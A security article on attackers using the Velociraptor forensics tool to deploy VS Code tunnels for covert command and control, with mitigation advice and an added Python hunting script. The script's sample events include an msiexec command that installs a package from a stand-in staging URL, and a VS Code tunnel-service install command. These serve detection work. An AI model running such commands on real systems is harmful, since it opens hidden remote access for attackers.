Attackers are now abusing Velociraptor, a legitimate digital forensics and incident response (DFIR) tool, to compromise networks and deploy Visual Studio Code (VS Code) for covert communication. This sophisticated tactic allows them to establish a command and control (C2) channel and evade detection by leveraging trusted, signed software.
The Modus Operandi
The attack chain starts with the initial compromise of a network, often through phishing or an exploit. Instead of deploying traditional malware, the attackers use the Windows msiexec utility to download a malicious Velociraptor installer from a staging server, often hosted on a platform like Cloudflare Workers.
Once Velociraptor is installed, the attackers use it to download and execute Visual Studio Code with its built-in tunneling feature enabled. This feature, meant for legitimate remote development, creates a secure, encrypted tunnel from the compromised machine to an attacker-controlled C2 server. Since VS Code is a signed application from Microsoft, its activity is often not flagged by security software.
The attackers also install VS Code as a persistent service on the system, ensuring they can maintain a backdoor even after a reboot. The use of Velociraptor as the initial payload and Visual Studio Code for C2 tunneling is particularly concerning because it allows attackers to “live off the land” by using legitimate tools to carry out their malicious activities. This technique minimizes their footprint and makes it more difficult for defenders to differentiate between benign and malicious network activity.
Why This Is a Problem for Defenders
- Bypassing Security Tools: Many endpoint detection and response (EDR) solutions are configured to allow trusted applications like Velociraptor and VS Code to run unimpeded. This attack exploits that trust.
- Encrypted Traffic: The C2 communication is carried out over an encrypted tunnel, making it difficult to inspect with traditional network monitoring tools.
- Stealthy Persistence: By installing VS Code as a service, attackers can maintain a long-term presence on a network without needing to rely on easily detectable malware.
- Precursor to Ransomware: Security researchers note that the unauthorized use of DFIR tools like Velociraptor is often a precursor to a ransomware attack.
What to Do
Organizations should take a proactive approach to mitigate this threat. This includes:
- Enhanced Monitoring: Monitor for the unexpected installation or execution of legitimate DFIR tools on endpoints where they are not typically used.
- Behavioral Analytics: Leverage EDR and XDR solutions to detect anomalous behaviors, such as a process like VS Code initiating a remote tunnel or a forensic tool being used in an unusual manner.
- Application Control: Implement strict application whitelisting policies to prevent the execution of unapproved software and to block unexpected services from being installed.
- Network Segmentation: Restrict outbound network connections and enforce strict egress filtering to prevent internal systems from communicating with untrusted domains.
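As an added illustration of the monitoring and behavioral checks above (example code written for this page, not from the article or the Velociraptor project), the following Python hunts constructed, Sysmon-style process-creation events for the three stages the article describes: msiexec fetching a remote package, Velociraptor running on a host outside the IR team's allow-list, and VS Code starting or installing a tunnel service. The field names and the DFIR_HOSTS allow-list are assumptions.

```python
"""Hunt for the Velociraptor -> VS Code tunnel chain in process-creation events.
Added example, not from the article. Events are constructed; field names are assumed
Sysmon-style (Host, Image, CommandLine); DFIR_HOSTS is an assumed allow-list."""
import re

DFIR_HOSTS = {"ir-jumpbox01"}  # hosts where the IR team legitimately runs Velociraptor

# Command-line patterns for each stage described in the article.
RULES = [
    ("msiexec-remote-package", re.compile(r"\bmsiexec(\.exe)?\b.*https?://", re.I)),
    ("vscode-tunnel", re.compile(r"\bcode(\.exe)?\s+tunnel\b", re.I)),
    ("vscode-tunnel-service-persistence",
     re.compile(r"\bcode(\.exe)?\s+tunnel\s+service\s+install\b", re.I)),
]

def classify(event):
    """Return the finding names raised by one process-creation event."""
    cmd, image = event.get("CommandLine", ""), event.get("Image", "").lower()
    findings = [name for name, pat in RULES if pat.search(cmd)]
    # A DFIR agent running outside the IR team's own hosts is itself a finding.
    if image.endswith("velociraptor.exe") and event.get("Host") not in DFIR_HOSTS:
        findings.append("velociraptor-unexpected-host")
    return findings

def hunt(events):
    """Flatten all findings into (host, finding) pairs, in event order."""
    return [(e["Host"], f) for e in events for f in classify(e)]

def chained_hosts(events):
    """Hosts showing both a staging step and a VS Code tunnel: the full chain."""
    by_host = {}
    for host, finding in hunt(events):
        by_host.setdefault(host, set()).add(finding)
    staging = {"msiexec-remote-package", "velociraptor-unexpected-host"}
    return sorted(h for h, f in by_host.items() if f & staging and "vscode-tunnel" in f)

# Constructed sample telemetry: one workstation showing the chain, plus benign noise.
SAMPLE_EVENTS = [
    {"Host": "ws-0423", "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "msiexec.exe /q /i https://staging.invalid/velo.msi"},
    {"Host": "ws-0423", "Image": r"C:\Program Files\Velociraptor\Velociraptor.exe",
     "CommandLine": "Velociraptor.exe --config client.config.yaml client"},
    {"Host": "ws-0423", "Image": r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\code.exe",
     "CommandLine": "code.exe tunnel service install --accept-server-license-terms"},
    {"Host": "ir-jumpbox01", "Image": r"C:\Tools\Velociraptor.exe",
     "CommandLine": "Velociraptor.exe gui"},
    {"Host": "dev-07", "Image": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "CommandLine": "Code.exe --new-window C:\\src"},
]

if __name__ == "__main__":
    for host, finding in hunt(SAMPLE_EVENTS):
        print(host, finding)
```

Each rule fires on its own for triage; chained_hosts raises the priority only where the staging step and the tunnel are both seen on the same host.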
This incident highlights a shift in attacker tactics, where they are now weaponizing defensive tools to their advantage. Security teams must adapt by focusing on detecting suspicious behaviors rather than just relying on signatures for known malware.